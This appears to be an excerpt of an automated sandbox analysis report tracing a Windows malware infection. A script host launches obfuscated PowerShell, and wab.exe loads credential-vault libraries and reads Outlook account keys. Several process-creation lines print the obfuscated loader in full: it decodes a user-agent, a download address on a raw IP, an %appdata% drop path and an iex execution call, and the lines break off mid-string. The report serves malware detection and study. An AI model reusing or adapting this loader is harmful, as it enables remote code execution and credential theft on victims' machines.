Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000004.00000002.2235317847.0000000007B60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb4 source: powershell.exe, 00000004.00000002.2235317847.0000000007B60000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatal", "0")
Source: Yara match File source: 00000004.00000002.2236560886.0000000009F6C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2236325736.0000000008060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2377560186.0000026CE6643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2230426508.0000000005418000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($alfabetiseres)$global:Silversmiths = [System.Text.Encoding]::ASCII.GetString($Bvelserne)$global:Reststraffenes=$Silversmiths.substring($Bibliomanis,$Rehumanized)<#bnnemde Decoctions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Huldrekvinde $Kaosets189 $headwards), (Savendes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:kloreres = [AppDomain]::CurrentDomain.GetAssemblies()$globa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Supraconduction)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Undladelsers, $false).DefineType($Kegleha
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($alfabetiseres)$global:Silversmiths = [System.Text.Encoding]::ASCII.GetString($Bvelserne)$global:Reststraffenes=$Silversmiths.substring($Bibliomanis,$Rehumanized)<#bnnemde Decoctions
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf 